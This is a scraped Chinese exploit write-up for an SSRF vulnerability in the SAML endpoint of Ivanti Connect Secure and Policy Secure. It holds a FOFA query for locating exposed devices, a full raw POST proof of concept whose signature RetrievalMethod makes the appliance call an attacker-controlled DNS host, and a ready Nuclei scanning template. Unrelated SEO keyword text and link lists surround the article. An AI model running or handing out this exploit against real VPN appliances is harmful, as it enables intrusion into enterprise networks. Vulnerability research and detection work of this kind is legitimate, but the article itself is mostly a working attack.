当前位置: 首页 > news >正文

企业网站后台管理妇科医院网站建设

企业网站后台管理,妇科医院网站建设,no7wordpress,企业门户网站建设方案免责声明#xff1a;文章来源互联网收集整理#xff0c;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;所产生的一切不良后果与文章作者无关。该…免责声明文章来源互联网收集整理请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 Ⅰ、漏洞描述 Ivanti Connect Secure 为远程和移动用户提供了一个无缝的、具有成本效益的 SSL VPN 解决方案使他们能随时随地从任何可上网的设备访问企业资源。 Ivanti Connect Secure9.x22.x和Ivanti Policy Secure9.x,22.x以及Ivanti Neurons for ZTA的SAML组件中存在SSRF漏洞。 Ⅱ、fofa语句 bodywelcome.cgi?plogo Ⅲ、漏洞复现 POC POST /dana-ws/saml20.ws HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Connection: close Content-Length: 831 Accept-Encoding: gzip?xml version1.0 encodingUTF-8?soap:Envelope xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/ soap:Body ds:Signature xmlns:dshttp://www.w3.org/2000/09/xmldsig# ds:SignedInfo ds:CanonicalizationMethod Algorithmhttp://www.w3.org/2001/10/xml-exc-c14n#/ ds:SignatureMethod Algorithmhttp://www.w3.org/2000/09/xmldsig#rsa-sha1/ /ds:SignedInfo ds:SignatureValueqwerty/ds:SignatureValue ds:KeyInfo xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xsi:schemaLocationhttp://www.w3.org/2000/09/xmldsig xmlns:dshttp://www.w3.org/2000/09/xmldsig# ds:RetrievalMethod URIhttp://your-dns/ ds:X509Data/ /ds:KeyInfo ds:Object/ds:Object /ds:Signature /soap:Body/soap:Envelope 1、构建poc 2、查看DNSlog记录 Ⅳ、Nuclei-POC id: Ivanti-Pulse-Connect-Secure-VPN-SSRFinfo:name: Ivanti Connect Secure9.x22.x和Ivanti Policy Secure9.x,22.x以及Ivanti Neurons for ZTA的SAML组件中存在SSRF漏洞。author: WLFseverity: highmetadata: fofa-query: bodywelcome.cgi?plogo variables:filename: {{to_lower(rand_base(10))}}boundary: {{to_lower(rand_base(20))}} http:- raw:- |POST /dana-ws/saml20.ws HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Connection: closeContent-Length: 831Accept-Encoding: gzip?xml version1.0 encodingUTF-8?soap:Envelope xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/ soap:Body ds:Signature xmlns:dshttp://www.w3.org/2000/09/xmldsig# ds:SignedInfo ds:CanonicalizationMethod Algorithmhttp://www.w3.org/2001/10/xml-exc-c14n#/ ds:SignatureMethod Algorithmhttp://www.w3.org/2000/09/xmldsig#rsa-sha1/ /ds:SignedInfo ds:SignatureValueqwerty/ds:SignatureValue ds:KeyInfo xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xsi:schemaLocationhttp://www.w3.org/2000/09/xmldsig xmlns:dshttp://www.w3.org/2000/09/xmldsig# ds:RetrievalMethod URIhttp://{{interactsh-url}}/ ds:X509Data/ /ds:KeyInfo ds:Object/ds:Object /ds:Signature /soap:Body/soap:Envelopematchers:- type: dsldsl:- contains(interactsh_protocol, dns)condition: and Ⅴ、修复建议 升级至安全版本
http://www.hkea.cn/news/14509773/

相关文章:

  • 模板网站的建设中山做网站
  • 个人网站命名 备案电子商务主要学什么专业课程
  • 换网站了吗河南旅游集团 网站建设
  • 网站建设与维护实验报告五星级酒店网站建设方案
  • 重庆化工建设信息网站金山网站建设费用
  • 百度网站建设如何网站建设好后怎么制作网页
  • 做百度网站费用多少vue 做网站 seo
  • 淮南市城乡建设档案馆网站美食网站建设的意义
  • 棋牌网站开发常熟做网站的公司
  • 免费设计海报的网站Wordpress国际收款
  • 网站建设兆金手指花总网站建设方案选公司
  • 苏州建网站的公司哪家公司好怎么查个人征信记录
  • 网站优化 流量怎么做自己网站的后台
  • wordpress 哪些网站如何做网络营销网站
  • 国外网站加速搜素引擎排名优化计费方式
  • 给网站增加功能怎么做良乡网站建设
  • 网站建设维护管理软件代理网页游戏多少钱
  • 大港天津网站建设查做空运磁检的网站
  • 学做网站php吗wordpress重建缩略图
  • 展示型装饰网站模板下载多城市分站站群cms
  • 黑龙江省建设集团有限公司网站自己做的网站能赚钱吗
  • 浙江众安建设集团有限公司网站长春财经学院是一本还是二本
  • 怎么修改网站首页logo网站优化中友情链接怎么做
  • 什么地方可以做网站wordpress 虚拟商品插件
  • 广州网站建设q.479185700棒wordpress 添加导航栏
  • 北京网站设计公司yy成都柚米科技15wordpress配置mysql
  • 网站建设开发综合实训报告泰安人才网最新招聘网
  • 做外单网站wordpress 动态插件
  • 网站项目总体设计模板公司品牌的塑造网站建设
  • 校园网门户网站建设不动户激活 e路护航安全组件